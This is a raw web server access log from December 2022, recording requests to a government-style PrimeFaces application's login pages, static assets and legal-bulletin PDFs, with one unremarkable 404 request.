172.22.2.4 - - [03/Dec/2022:10:19:12 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
172.22.2.4 - - [03/Dec/2022:10:17:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58612
216.245.221.92 - - [03/Dec/2022:10:19:39 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12496
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
201.245.192.253 - - [03/Dec/2022:10:19:41 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=qXCb+sikeAAoBcmZdyDbJMEl.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12174
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11235
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:19:44 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
201.245.192.253 - - [03/Dec/2022:10:19:45 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
191.109.180.184 - - [03/Dec/2022:10:19:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202020/2178.pdf HTTP/1.1" 200 4906782
201.245.192.253 - - [03/Dec/2022:10:19:48 -0500] "POST /sipse/faces/presentacion/sistema/seguridad/seleccionRol.xhtml HTTP/1.1" 200 5600
64.62.197.155 - - [03/Dec/2022:10:20:13 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [03/Dec/2022:10:20:43 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
201.245.192.253 - - [03/Dec/2022:10:20:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:20:43 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12180
201.245.192.253 - - [03/Dec/2022:10:20:43 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
201.245.192.253 - - [03/Dec/2022:10:20:43 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
